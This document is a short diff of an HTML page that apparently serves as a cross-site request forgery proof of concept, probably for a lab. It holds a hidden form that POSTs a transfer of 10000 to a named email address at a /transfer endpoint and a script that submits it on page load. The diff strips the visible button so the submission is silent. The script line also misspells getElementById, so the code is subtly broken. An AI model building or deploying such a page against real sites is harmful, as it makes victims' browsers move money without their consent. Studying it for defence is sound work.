--- a/index.html
+++ b/index.html
@@ -1,6 +1,9 @@
-<form id="form1" action="http://192.168.2.98:55824/transfer" method="POST">
-  <input type="text" class="form-control" id="inputTo" name="user_to" placeholder="Who do you want to transfer to?" value="alexqiu@gmail.com">
-  <input type="number" class="form-control" id="inputAmount" name="amount" placeholder="Amount to transfer" value="10000">
-  <button type="submit" class="btn btn-primary">Send the Money!</button>
+<html>
+  <body>
+  <form id="form1" action="http://192.168.2.98:55824/transfer" method="POST">
+  <input type="text" class="form-control" id="inputTo" name="user_to" value="alexqiu@gmail.com">
+  <input type="number" class="form-control" id="inputAmount" name="amount"  value="10000">
 </form>
 <script>document.getElementByld("form1").submit();</script>
+</body>
+</html>
